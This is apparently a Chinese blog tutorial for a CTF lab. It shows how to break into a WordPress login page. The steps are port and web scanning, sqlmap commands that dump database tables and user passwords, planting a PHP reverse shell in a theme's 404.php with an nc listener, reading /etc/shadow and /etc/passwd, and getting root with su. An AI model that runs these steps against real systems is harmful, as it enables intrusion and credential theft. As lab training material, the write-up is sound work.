6-2CTF夺旗入门教程--SQL注入POST参数-注入HTTP报文

最新推荐文章于 2024-03-30 11:51:52 发布
最新推荐文章于 2024-03-30 11:51:52 发布
阅读量703 收藏 3
点赞数
分类专栏: CTF学习 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105339762
版权
1.信息探测
#扫描主机开放的全部端口
nmap -T4 -p- 192.168.2.117
#扫描靶场全部信息
nmap -T4 -A -v 192.168.2.117
#探测敏感信息
nikto -host http://
dirb http://
#漏洞扫描
owasp
2.漏洞利用

登录界面
在这里插入图片描述

#burpsuite抓包,需要把浏览器设置代理
#在登录界面尝试登录,抓取请求数据包,保存为request.raw文件
#用sqlmap利用漏洞

在这里插入图片描述

#查看服务器所有数据库
sqlmap -r request.raw --level 5 --risk 3 --dbs --dbms mysql --batch

在这里插入图片描述

#查看wordpress8080数据库的表名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 --tables --dbms mysql --batchv

在这里插入图片描述

#查看users表的列名
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users --columns --dbms mysql --batch

在这里插入图片描述

查看users表的列和值
sqlmap -r request.raw --level 5 --risk 3 -D wordpress8080 -T users -C username,password --dump --dbms mysql --batch

在这里插入图片描述

3.上传webshell获取控制权
#主题的404.php可以上传webshell
#webshell 获取 /usr/share/webshells/php/ 目录
#使用反弹shell脚本
cp php-reverse-shell.php /root/Downloads/
#修改脚本参数,攻击机IP和端口
gedit php-reverse-shell.php
#启动监听
nc -nlvp 4444
#访问页面,获取反弹shell
http://192.168.2.117:8080/wordpress/wp-content/themes/twentythirtheen/404.php
#美化终端
python -c "import pty;pty.spawn('/bin/bash')"
#查看敏感文件
cat /etc/shadow 
cat /etc/passwd
#使用su - 提权
su - 
#口令尝试wordpress8080数据库中的密码,登录成功
4.总结

只要是用户可以输入的位置都是有可能存在注入点的
漏洞扫描器的结果不一定准确

The Riddler.
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用,两种方法一道题
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
6-8CTF夺旗入门教程--命令执行
高冷的宅先生
05-04 677
1.命令执行漏洞介绍 当应用需要调用一些外部程序去处理内容时,会用到一些执行系统命令的函数。 如php中的system、exec、shell_exec等 当用户可以控制命令执行函数中的参数时,将可以注入 恶意系统命令到正常命令中,造成命令执行攻击 调用这些函数执行系统命令时,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有过滤用户输入的情况下,就会造成命令执行漏洞 2. 信息探测 #扫描主...
6-1CTF夺旗入门教程--SQL注入GET参数
高冷的宅先生
04-05 754
1.SQL注入漏洞介绍 SQL注入产生的原因主要为以下几方面: 不当的类型处理 不安全的数据库配置 不合理的查询集处理 不当的错误处理 不当的转义字符处理 不当的多个提交处理 2.信息探测 #扫描服务器信息及服务版本 nmap -sV 192.168.2.116 #快速扫描靶场全部信息 nmap -T4 -A -v 192.168.2.116 #探测敏感信息 nikto -host...
CTF练习:SQL注入post参数http报文注入
qq_43233085的博客
11-25 2402
CTF练习:SQL注入post参数http报文注入环境准备信息收集http报文获取sqlmap注入上传shell脚本进入靶机 靶机地址: 链接: https://pan.baidu.com/s/1zNyLqsxhYxAsl77tTI6agA 提取码: 56kj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75....
CTFCTF(夺旗赛)介绍
WenZhongxiang
10-06 4400
CTF攻防模式(Attack-Defense)是CTF比赛的一种模式,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。需要具备安全编程的能力,能够编写安全的代码等等。CTF比赛的知识范围大致分为:Web安全、PWN(二进制安全)、逆向工程、Misc(杂项)、Crypto(密码学安全)、网络安全。国外:ctftime.org 是对一个在国际上比较重要的赛事的做一些记录,而且会还会给出赛事的一些权重,以及对这种CTF 知名战队的一些排名。
CTF_Web_SQL注入常用命令
weixin_69026383的博客
03-30 693
CTF_Web_SQL注入常用命令本人周日参加比赛,临时抱佛脚把书上涉及到的内容进行简单的收录整理。
BugkuCTF Writeup——Web
Lethe's Blog
03-07 3013
BugkuCTF Web——Writeup 作为我这个新手刷的第一个平台,bugku上面的大部分题目还算蛮友好的,这里主要记录一下其中我认为还蛮有意思的题目。 web2 直接查看F12查看源码即可得flag。 计算器 简单计算题,但输入框限制输入长度,直接改改输入框的前端代码,输入计算结果,得到flag。 web基础$_GET 代码审计,GET方法传入what变量的值为’flag’即可得fl...
[攻防实战]CTF大赛准备(手动注入sql
05-17 450
一、IIS write漏洞利用 先用工具扫描,再上传小马,使用菜刀连接即可。 思考点: 如何获知是一台IIS站点? 本例中上传的一句话木马是什么意思? <%eval request("MH")%>    https://www.cnblogs.com/tdcqma/p/6125789.html 二、Tomcat服务器漏洞利用 先用nmap扫描端口开放信...
stripe-ctf-2.0:夺旗
05-19
《Stripe CTF 2.0:网络版夺旗赛详解》 Stripe CTF(Capture The Flag)2.0 是一场网络安全竞赛,源自2012年8月22日至29日期间举办的一系列挑战。这个活动的目标是通过解决各种安全问题来提升参与者的网络安全技能...
pin-in-CTF:使用intel pin来求解一部分CTF challenge
05-09
4. **pin-in-CTF-master文件夹结构**: 该项目的主分支可能包含以下内容: - `src`: 存放Pin工具的源代码和插件代码。 - `docs`: 文档和教程,帮助理解如何使用Pin工具解决CTF挑战。 - `examples`: 示例代码,...
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
ctf夺旗
m0_63017769的博客
11-12 5839
好久以前做过的ctf
i春秋网络内生试验场CTF答题夺旗赛(第三季)WP
李熠专用博客_白帽子一枚,人称低危终结者
11-30 2476
0x01 weak 依次点击管理平台->跳转到测试页,可看到测试页代码,可知是一道MD5弱类型的题,只需要找到MD5加密出来为0e,并且用户名和密码不相等且不为数字的即可,笔者已找到两个符合条件的明文,分别是:QNKCDZO和aabg7XSs,回到管理页,用户名和密码分别输入可得flag。 0x02 Electrical System 逆向分析程序可知,这是一个栈溢出的题,编写exp如下:...
CTF-命令执行
Luodehahajiang的博客
07-03 1789
ctf 命令执行 命令执行函数 命令执行绕过方法
CTF-SQL注入POST
su__xiaoyan的博客
12-23 1573
实验环境: 攻击者:Kali Linux(192.168.0.10) 靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(32-bit)(192.168.0.250) 实验流程: 信息探测 检测与靶机的网络连通性 端口扫描,服务探测 详细信息扫描 命令:nmap -A -v -T4 192.168.0.250 对80端口的web服务进行目录扫描 通过目录扫描发现一个phpmyadmin和登录页面login.php 登录页面没有验证码和防爆破机制,可以进行暴力破解。登录
SQL注入POST参数-注入HTTP报文
FXHQAQ的博客
12-22 2225
1、SQL注入漏洞介绍 SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数; 实验环境 攻击机:10.0.2.11 靶场机器:10.0.2...
CTF训练 web安全SQL注入(post)
梁辰兴的博客
10-24 1059
SQL注入攻击指的是用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据入侵系统。任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中,POST传递的参数。只要是用户可以输入的位置都是有可能存在注入点的;漏洞扫描器的扫描结果也不一定正确。
6-6CTF夺旗入门教程--暴力破解
高冷的宅先生
05-02 959
1.信息探测 #扫描主机服务信息以及服务版本 nmap -sV 192.168.2.108 #快速扫描主机全部信息 nmap -T4 -A -v 192.168.2.108 #探测敏感信息 nikto -host http://192.168.2.108 dirb http://192.168.2.108 2.深入挖掘 分析nmap、nikto扫描结果,分析挖掘可以利用的信息 查看http敏感页面...
mysqlSQL注入CTF Web安全探索关键信息库
本文档主要探讨了MySQLSQL注入在Web安全CTF(Capture The Flag,网络安全竞赛)中的重要性,结合了对系统库的深入解析以及常用指令的操作。首先,我们来了解一下MySQL的核心组成部分和它们的功能: 1. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值